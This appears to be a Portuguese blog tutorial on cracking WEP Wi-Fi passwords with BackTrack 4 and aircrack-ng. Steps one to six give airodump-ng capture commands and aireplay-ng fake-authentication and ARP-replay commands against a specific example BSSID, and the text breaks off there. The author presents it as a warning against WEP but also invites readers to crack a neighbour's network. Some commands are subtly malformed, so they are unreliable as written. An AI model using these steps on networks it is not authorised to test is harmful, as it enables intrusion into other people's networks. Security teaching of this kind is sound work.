Rede
Hoje vou criar um tutorial bastante interessante, para mostrar a você como a criptografia WEP de redes Wireless é falha. Você também poderá usar esse tutorial para quebrar a senha do seu vizinho (maldade) ou de algum amigo seu que duvide que você consiga essa "façanha".
Mas o intuito principal, é mostrar para você que utiliza um AP (Acess Point) que não é recomendável a utilização da criptografia WEP, para ficar mais seguro e sem invasão, porém, após este tutorial vou tentar quebrar a criptografia WPA e se conseguir irei postar aqui no TEO como fazer.
Siga os passos abaixo para "quebrar" senhas WEP
1 - Baixe o sistema operacional Backtrack 4, após o termino do download grave a imagem ISO em um DVD, dê boot no mesmo e espere carregar o sistema (se o sistema não iniciar em modo gráfico, basta digitar o comando STARTX);
2 - Com o sistema já aberto em modo gráfico abra um Terminal e digite (sempre teclando ENTER após cada comando): airmon-ng Se a sua placa de rede não está listada é porque seu chipset não é compatível com o sistema, no meu caso estou usando uma Ralink 2573 USB.
3 - Depois digite:
airodump-ng wlan0
Onde "wlan0" é a interface da placa de rede que estou usando
4 - Agora estarão listadas todas as redes que sua placa está conseguindo enxergar, agora digite:
airodump-ng -w wep -c (CH) --bssid (BSSID) wlan0
Onde (CH) é o canal da rede que você quer quebrar a senha, no meu caso canal 11
E o (BSSID) é a MAC da rede que você quer quebrar a senha, no meu caso 00:E0:4C:F5:9E:E8
Então no meu caso ficou assim:
airodump-ng -w wep -c 11 --bssid 00:E0:4C:F5:9E:E8 wlan0
5 - Abra um novo terminal e digite:
aireplay-ng -1 0 - a (bssid) wlan0
No meu caso ficou assim:
aireplay-ng -1 0 - a 00:E0:4C:F5:9E:E8 wlan0
6 - Abra mais um terminal e digite:
aireplay-ng -3 -b (bssid) wlan0
No meu caso ficou assim:
aireplay-ng -3 -b 00:E0:4C:F5:9E:E8